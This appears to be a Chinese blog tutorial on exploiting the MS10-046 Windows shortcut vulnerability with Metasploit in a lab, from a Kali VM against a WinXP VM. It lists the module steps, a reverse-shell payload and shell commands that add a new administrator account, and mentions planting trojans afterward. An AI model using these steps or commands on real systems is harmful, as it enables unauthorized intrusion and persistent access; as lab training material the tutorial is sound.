Metasploit(msf)系列-利用快捷方式漏洞进行渗透提权

原理:

       利用WinXP、Windows2000、Windows2003、Windows Vista等系统存在的漏洞Windows Shell中的漏洞可能允许远程执行代码,如果显示特制的快捷方式图标,则可能允许远程执行代码,成功利用此漏洞的攻击者拥有与本地用户相同的用户权限。

准备:

靶    机:VMware下的WinXP系统  IP:192.168.1.111

攻击主机:VMware下的Kali系统     IP:192.168.1.110

在WinXP系统中建立个共享文件夹,右击选择属性,点开共享,按下图设置

渗透提权过程:

Step1:进入metasploit

Step2:search寻找ms10_046攻击模块

Step3:使用第一个模块(use + 模块名称)

Step4:设置payload反弹

Step5:使用show options命令,查看需设置的参数

这里需要设置的是SRVHOST、LHOST

Step6:设置SRVHOST、LHOST参数

Step7:exploit生成链接

Step8:在WinXP系统访问\\192.168.1.110\BBsgRC\,就是访问共享文件夹

可以看出出现了两个快捷方式的文件

Step9:攻击成功

Step10:sessions -i 2,选择攻击模块

Step11:在WinXP系统中访问http://192.168.1.110:80/

Step12:攻击成功

Step13:sessions -i 3,选择攻击模块,shell进行提权

Step:14:net user查看WinXP系统用户

Step15:添加用户

net user test 789456123 /add

net localgroup Administrators test /add

Step16:查看test用户是否成功

之后就可以对该主机进行一些越权的操作了:可以对WinXP系统进行远程登录、可以在该主机放入木马文件、删除文件等。

  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值